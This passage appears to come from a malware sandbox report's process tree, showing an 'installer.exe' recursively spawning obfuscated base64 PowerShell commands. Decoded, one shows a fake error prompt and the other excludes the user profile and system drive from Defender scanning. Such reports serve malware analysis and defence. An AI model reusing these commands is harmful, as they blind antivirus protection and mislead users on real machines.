        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        99⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        99⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        99⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        100⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        100⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        100⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        101⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        101⤵
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        101⤵
        System Location Discovery: System Language Discovery
        
        PID:2928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        102⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        102⤵
        System Location Discovery: System Language Discovery
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        102⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        103⤵
        
        PID:3344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        103⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        103⤵
        System Location Discovery: System Language Discovery
        
        PID:4328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        104⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        104⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        104⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        105⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        105⤵
        
        PID:7320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        106⤵
        
        PID:7352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        106⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        106⤵
        System Location Discovery: System Language Discovery
        
        PID:7392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        107⤵
        System Location Discovery: System Language Discovery
        
        PID:7416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        107⤵
        System Location Discovery: System Language Discovery
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        107⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        108⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        108⤵
        System Location Discovery: System Language Discovery
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        108⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        109⤵
        System Location Discovery: System Language Discovery
        
        PID:7664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        109⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        109⤵
        
        PID:8148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        110⤵
        
        PID:8180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        110⤵
        
        PID:7228
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        110⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        111⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        111⤵
        
        PID:7396
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        111⤵
        System Location Discovery: System Language Discovery
        
        PID:7456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        112⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        112⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        112⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        113⤵
        
        PID:7304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        113⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        113⤵
        
        PID:7892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        114⤵
        
        PID:8144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        114⤵
        
        PID:7620
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        114⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
